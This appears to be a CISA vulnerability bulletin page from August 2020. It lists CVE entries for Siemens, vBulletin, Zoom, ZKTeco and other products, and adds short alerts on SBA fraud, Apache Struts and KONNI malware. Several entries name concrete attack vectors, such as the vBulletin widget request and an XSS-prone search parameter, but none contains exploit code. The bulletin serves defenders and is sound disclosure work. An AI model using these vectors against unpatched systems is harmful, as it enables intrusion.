A vulnerability has been identified in Automation License Manager 5 (All versions), Automation License Manager 6 (All versions < V6.0.8). The application does not properly validate the users’ privileges when executing some operations, which could allow a user with low permissions to arbitrary modify files that should be protected against writing.
2020-08-14
not yet calculated

CVE-2020-7583
MISC

siemens — desigo_cc_and_desigo_cc_compact
 
A vulnerability has been identified in Desigo CC (V4.x), Desigo CC (V3.x), Desigo CC Compact (V4.x), Desigo CC Compact (V3.x). Affected applications are delivered with a 3rd party component (BIRT) that contains a remote code execution vulnerability if the Advanced Reporting Engine is enabled. The vulnerability could allow a remote unauthenticated attacker to execute arbitrary commands on the server with SYSTEM privileges.
2020-08-14
not yet calculated

CVE-2020-10055
MISC
MISC

siemens — sicam_a8000_rtu_devices
A vulnerability has been identified in SICAM WEB firmware for SICAM A8000 RTUs (All versions < V05.30). The login screen does not sufficiently sanitize input, which enables an attacker to generate specially crafted log messages. If an unsuspecting victim views the log messages via the web browser, these log messages might be interpreted and executed as code by the web application. This Cross-Site-Scripting (XSS) vulnerability might compromize the confidentiality, integrity and availability of the web application.
2020-08-14
not yet calculated

CVE-2020-15781
MISC

smartcontrol — smartcontrol
 
An Uncontrolled Search Path Element (CWE-427) vulnerability in SmartControl version 4.3.15 and versions released before April 15, 2020 may allow an authenticated user to escalate privileges by placing a specially crafted DLL file in the search path. This issue was fixed in version 1.0.7, which was released after April 15, 2020. (Note, the version numbering system changed significantly between version 4.3.15 and version 1.0.7.)
2020-08-13
not yet calculated

CVE-2020-7360
MISC

sonatype — nexus_repository_manager
 
Sonatype Nexus Repository Manager OSS/Pro before 3.26.0 has Incorrect Access Control.
2020-08-12
not yet calculated

CVE-2020-15868
CONFIRM

spirent — testcenter_and_avalanche
 
An issue was discovered on Spirent TestCenter and Avalanche appliance admin interface firmware. An attacker, who already has access to an SSH restricted shell, can achieve root access via shell metacharacters. The attacker can then, for example, read sensitive files such as appliance admin configuration source code. This affects Spirent TestCenter and Avalanche products which chassis version <= 5.08. The SSH restricted shell is available with default credentials.
2020-08-13
not yet calculated

CVE-2020-11733
MISC
MISC

st_engineering — vpncrypt_m10
 
The Web portal of the WiFi module of VPNCrypt M10 2.6.5 allows command injection via a text field, which allow full control over this module’s Operating System.
2020-08-12
not yet calculated

CVE-2020-12107
MISC
MISC

st_engineering — vpncrypt_m10
 
The Web portal of the WiFi module of VPNCrypt M10 2.6.5 allows unauthenticated users to send HTTP POST request to several critical Administrative functions such as, changing credentials of the Administrator account or connect the product to a rogue access point.
2020-08-12
not yet calculated

CVE-2020-12106
MISC
MISC

textpattern — textpattern
 
In Textpattern 4.5.7, an unprivileged author can change an article’s markup setting.
2020-08-14
not yet calculated

CVE-2015-8032
CONFIRM
CONFIRM

textpattern — textpattern
 
In Textpattern 4.5.7, the password-reset feature does not securely tether a hash to a user account.
2020-08-14
not yet calculated

CVE-2015-8033
CONFIRM
CONFIRM

tridium — niagara_and_niagara_enterprise_security
A timeout during a TLS handshake can result in the connection failing to terminate. This can result in a Niagara thread hanging and requires a manual restart of Niagara (Versions 4.6.96.28, 4.7.109.20, 4.7.110.32, 4.8.0.110) and Niagara Enterprise Security (Versions 2.4.31, 2.4.45, 4.8.0.35) to correct.
2020-08-13
not yet calculated

CVE-2020-14483
MISC

trousers — toursers
 
An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges instead of by the tss user, it fails to drop the root gid privilege when no longer needed.
2020-08-13
not yet calculated

CVE-2020-24330
MLIST
MISC
MISC
MISC

trousers — toursers
 
An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges, the tss user still has read and write access to the /etc/tcsd.conf file (which contains various settings related to this daemon).
2020-08-13
not yet calculated

CVE-2020-24331
MLIST
MISC
MISC
MISC

trousers — toursers
 
An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges, the creation of the system.data file is prone to symlink attacks. The tss user can be used to create or corrupt existing files, which could possibly lead to a DoS attack.
2020-08-13
not yet calculated

CVE-2020-24332
MLIST
MISC
MISC
MISC

vbulletin — vbulletin
 
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
2020-08-12
not yet calculated

CVE-2020-17496
MISC
MISC
MISC

vmware — concourse
 
Concourse, versions prior to 6.3.1 and 6.4.1, in installations which use the GitLab auth connector, is vulnerable to identity spoofing by way of configuring a GitLab account with the same full name as another user who is granted access to a Concourse team. GitLab groups do not have this vulnerability, so GitLab users may be moved into groups which are then configured in the Concourse team.
2020-08-12
not yet calculated

CVE-2020-5415
CONFIRM
CONFIRM

wireshark — wireshark
 
In Wireshark 3.2.0 to 3.2.5, the Kafka protocol dissector could crash. This was addressed in epan/dissectors/packet-kafka.c by avoiding a double free during LZ4 decompression.
2020-08-13
not yet calculated

CVE-2020-17498
MISC
MISC
MISC

wordpress — worpress
 
A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
2020-08-14
not yet calculated

CVE-2019-6112
CONFIRM
MISC

zalo — zalo_desktop
 
An issue was discovered in Zalo.exe in VNG Zalo Desktop 19.8.1.0. An attacker can run arbitrary commands on a remote Windows machine running the Zalo client by sending the user of the device a crafted file.
2020-08-13
not yet calculated

CVE-2020-16087
MISC
MISC
MISC

zkteco — facedepot_7b_and_zkbiosecurity_server
 
A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.
2020-08-14
not yet calculated

CVE-2020-17474
MISC

zkteco — facedepot_7b_and_zkbiosecurity_server
 
Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.
2020-08-14
not yet calculated

CVE-2020-17473
MISC

zoom — zoom
 
A vulnerability related to Dynamic-link Library (“DLL”) loading in the Zoom Sharing Service would allow an attacker who had local access to a machine on which the service was running with elevated privileges to elevate their system privileges as well through use of a malicious DLL. Zoom addressed this issue, which only applies to Windows users, in the 5.0.4 client release.
2020-08-14
not yet calculated

CVE-2020-9767
CONFIRM

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 14, 2020The U.S. Small Business Administration (SBA) is aware of fraudulent schemes and scams targeting its ongoing economic relief efforts. The SBA requests that suspected SBA-related spoofing or phishing fraud be reported to the SBA Office of the Inspector General (OIG) Hotline at 800-767-0385 or online at SBA OIG Hotline.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review  SBA’s fraud alert as well as CISA’s Alert on the subject. Suspected malware, phishing, or other cyber criminal activity can also be reported to the Federal Bureau of Investigation Internet Crime Complaint Center (IC3) or through the CISA Incident Reporting System.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 14, 2020The Apache Software Foundation has released a security advisory to address vulnerabilities in Struts in the version range 2.0.0—2.5.20. An attacker could exploit one of these vulnerabilities to take control of an affected system. The current version, Struts 2.5.22, is not affected.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache’s security advisory for CVE-2019-0230 and CVE-2019-0233 and upgrade to the appropriate version.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 14, 2020This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

This product is provided subject to this Notification and this Privacy & Use policy.